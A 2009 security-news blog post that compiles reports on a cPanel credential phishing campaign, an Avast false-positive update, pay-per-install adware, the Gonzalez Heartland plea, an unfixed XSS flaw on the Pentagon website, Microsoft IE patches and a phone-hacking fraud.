Wednesday, 9 December 2009

Hackers Target Webmasters cpanel login Phish

Fraudsters are targeting webmasters in a massive phishing campaign that attempts to trick marks into giving up credentials needed to administer their sites.

The emails are sent to customers of some of the world's most widely used webhosts, including GoDaddy, Hostgator, Yahoo!, and 50Webs. Although the subject lines vary, they all purport to come from the hosting service. In all, admins from at least 90 different webhosts are being targeted.

"Due to the system maintenance, we kindly ask you to take a few minutes to confirm your FTP details," the emails state.

Those who take the bait are led to a website formatted to look like a page from cPanel, the widely used website administration program. Once a website's address and FTP credentials are entered, users are directed to their host's login page.

Over the past year, scammers have increasingly targeted administrators of legitimate websites. According to a review in the third quarter of this year by security firm Dasient, 5.8 million pages from 640,000 websites were infected with code designed to launch malware attacks on visitors. ScanSafe, a separate security firm, has been tracking a single infection known as Gumblar that's taken over at least 2,000 websites by stealing their administrator credentials.

The latest phishing campaign was uncovered by Gary Warner, the director of research in computer forensics at the University of Alabama at Birmingham. It's unclear if it has any relation to Gumblar or what exactly happens to a site whose admin has fallen for the scam. His report is here

Avasts Human error!

Popular free of charge anti-virus scanner Avast went berserk late last week and began classifying legitimate files as infected.

Legitimate products were wrongly classified as harbouring the Dell-MZG Trojan or other strains of malware and whisked off to quarantine following the publication of a dodgy update. Avast has published a new update that eliminates the wrongful classification glitch. However, that still leaves users who applied the earlier update with borked systems.

False positives are a well known shortcoming of anti-malware scanners. Avast's snafu last Thursday was only unusual because it classified a large number of legitimate programmes as malign. Software from Adobe, Realtek sound card drivers and various media players were all affected.

Avast has published an apology for the cock-up and advice on restoring systems in a blog post (here) and its forum (here).

The anti-virus firm blamed "human error" for the mix-up.

Adware touts $1 bribe to prospective zombies

An adware distributor is offering to pay punters $1 to install their crud.

The bribe comes attached to malware, specifically an application bundle that includes adware and agents that change browser home pages, detected by Sunbelt Software as C4DLMedia and classified as a medium risk threat. The offer of payment is buried in the application's terms and conditions.

Even if the adware slingers come through on this offer to pay via PayPal, the amount of the bribe is probably a problem. "In places where a dollar is worth enough to make this worth the effort, there probably isn’t any internet connectivity," writes Sunbelt security researcher Tom Kelchner.

Sunbelt's blog contains a screenshot illustrating C4DLMedia's terms and conditions here.

Even though $1 barely stretches to a pint of milk these days, the price on offer from C4DLMedia (taken at face value) appears high. Pay-per-install malware affiliates typically earn far, far less. Recent research found that malware affiliates might earn only $140 per 1,000 US-based machines they infect, between $30-$110 for Western European infections and just $6 per 1,000 infected computers located in Asia.

TJX Hacker to Plead Guilty to Heartland Breach

By Kim Zetter
Threat Level
Wired.com
December 8, 2009

Admitted TJX intruder Albert Gonzalez has entered into a plea agreement
on charges that he hacked into Heartland Payment Systems, Hannaford
Brothers, 7-Eleven and two other unnamed national retailers.

The revelation comes in a filing made by Gonzalez's attorney in U.S.
District Court in New Jersey, where the Heartland charges were filed in
August.

A federal judge on Tuesday officially transferred the New Jersey case to
Massachusetts, where Gonzalez is seeking to merge it with two other
cases in which he’s already pleaded guilty.

Gonzalez, a former Secret Service informant known by the online nicks
"segvec" and "Cumbajohnny," was charged in New Jersey in August, along
with two unnamed Russian hackers. They were accused of stealing more
than 130 million debit and credit cards from card-processing company
Heartland and the other target companies.

Gonzalez and 10 others were also charged in May 2008 in New York and in
August 2008 in Massachusetts with network intrusions into TJX,
OfficeMax, Dave & Busters restaurant chain and other companies. Gonzalez
pleaded guilty to these charges in August and was scheduled to be
sentenced in Massachusetts on Dec. 21 in both cases.

Hacker Exposes Unfixed Security Flaws In Pentagon Website

By Kelly Jackson Higgins
DarkReading
Dec 08, 2009

A Romanian hacker has posted a proof-of-concept attack exploiting
vulnerabilities on the Pentagon's public Website that were first exposed
several months ago and remain unfixed.

The hacker, who goes by Ne0h, demonstrated input validation errors in
the site's Web application that allow an attacker to wage a cross-site
scripting (XSS) attack. The XSS vulnerability had been previously
disclosed by at least two other researchers several months ago -- and
Ne0h's findings show the bug is still on the site.

The site, which is run by the Office of the Assistant Secretary of
Defense for Public Affairs, is basically a tourist site for the Pentagon
and doesn't appear to house any sensitive data. But a security
researcher who studied the Ne0h's work says the Pentagon Website could
be used to redirect users to a malicious site posing as the Pentagon
site.

Daniel Kennedy, partner with Praetorian Security Group, says the session
ID appears to be a tracking cookie, and JavaScript can be injected into
the page itself to redirect a user to another site, for instance. "Since
I can pass that page a reference to an external JavaScript, I can do
most anything I can do in JavaScript," says Kennedy, who blogged about
the find yesterday. "That includes basic stuff, like crafting a URL to
send to users that appears to be from the Pentagon, but actually
redirects to 'evil.org,'" for example, he says.

Microsoft plugs zero-day IE hole

By Elinor Mills
InSecurity Complex
CNet News
December 8, 2009

Microsoft released fixes on Tuesday for a critical vulnerabilities in
Internet Explorer, including one for which exploit code has been
released.

Adobe, meanwhile, was scheduled to release a critical update affecting
Flash Player and Adobe AIR, following news of exploit code being
released for a vulnerability in Illustrator CS3 and CS4 on Windows and
Mac last week.

Microsoft's regular Patch Tuesday release includes six security
bulletins addressing 12 vulnerabilities in IE, Windows, Windows Server,
and Office.

However, priority should be given to the cumulative IE bulletin, which
affects all major Windows versions including Windows 7, IE 6, IE 7, and
IE 8. The bulletin fixes five holes that could allow an attacker to
remotely take control over a system in drive-by download attacks. The
fix also addresses a problem with ActiveX control built with Microsoft
Active Template Library (ATL) headers that could allow remote code
execution.

"Vulnerabilities in IE are generally pretty serious because all you have
to do is go to a Web page or get referred to one" that has malicious
code on it, said Jason Avery, manager of the Digital Vaccine service at
Tipping Point. Three of the IE holes were disclosed through Tipping
Point's Zero Day Initiative program over the summer, he said.

Hacker charges $43, 000 in calls to Buffalo Grove firm's phone

By KATHY ROUTLIFFE
Pioneerlocal.com
December 8, 2009

"Reach out and trick someone" could be the slogan of a hacker who
charged $43,000 in telephone calls -- mostly to Cuba -- to a Buffalo
Grove worker's company phone within a period of days.

Police reported that an employee at RMS Technologies, 1359 N. Barclay
Blvd., became aware someone had hacked into the phone system to make
free calls after his phone service carrier warned of the unusual
activity between Oct. 9 and 12.

"As far as how the technology works to rack up that many calls, we don't
know,” police Cmdr. Steven Husak said Monday. "(The employee's) phone
carrier alerted him to the situation, and he thought he had resolved it
until he received the bill."

emails

a

The Register - Security

IQ test

The Register - Security: Anti-Virus

HackWire - Hacker News